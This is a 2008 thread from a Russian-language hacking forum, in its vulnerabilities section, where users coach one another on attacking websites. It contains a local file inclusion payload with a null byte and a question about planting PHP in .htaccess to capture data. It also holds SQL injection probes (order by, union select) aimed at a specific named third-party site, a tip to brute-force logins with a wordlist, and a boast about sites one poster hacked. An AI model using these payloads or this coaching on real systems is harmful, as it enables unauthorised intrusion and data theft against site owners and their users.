ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3981  
Старый 02.12.2008, 19:52
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Работает ли php код в файлах .htpasswd и .htaccess?
Можно ли встроить туда свой код, чтобы перехватывались данные и сохранялись отдельным файлом?
Права на запись есть.
 
Ответить с цитированием

  #3982  
Старый 02.12.2008, 20:25
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

krypt3r
бред.. тот же самый результ изза ?
инклуд будет когда:
http://site.com/index.php?page=views&id=2
тогда:
http://site.com/index.php?page=..index.php%00&id=2

Octave_Parango
есть прога сипт.. качаеш мега словяк и вперед брутить..

Последний раз редактировалось sabe; 02.12.2008 в 20:27..
 
Ответить с цитированием

  #3983  
Старый 02.12.2008, 20:38
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
 
Ответить с цитированием

  #3984  
Старый 02.12.2008, 20:57
Аватар для Ghost0ff
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

Цитата:
пытался подставлять 1+order+by+1/* таже самая ошибка ... 1+order+by+5000000/* без изменений
пробуй +order+by+5000000 --
либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.
 
Ответить с цитированием

  #3985  
Старый 02.12.2008, 21:11
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)

полей вроде 4

+group+by+1 вроде ошибок нет)

что дальше делать ?)))
 
Ответить с цитированием

  #3986  
Старый 02.12.2008, 21:15
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))
 
Ответить с цитированием

  #3987  
Старый 02.12.2008, 21:18
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от BanQui  
сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - !
И зачем так нужно делать? Особенно если учесть что это не правильно.
Так нужно делать только потому что ты не знаком с синтаксисом SQL?

Последний раз редактировалось Grey; 02.12.2008 в 21:20..
 
Ответить с цитированием

  #3988  
Старый 02.12.2008, 21:20
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Хммм в большенстве случаев этот вариант прокатывает!!!
 
Ответить с цитированием

  #3989  
Старый 02.12.2008, 21:21
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???
 
Ответить с цитированием

  #3990  
Старый 02.12.2008, 21:26
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Почитай здесь:
http://forum.antichat.ru/thread12123.html

Последний раз редактировалось -m0rgan-; 02.12.2008 в 21:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ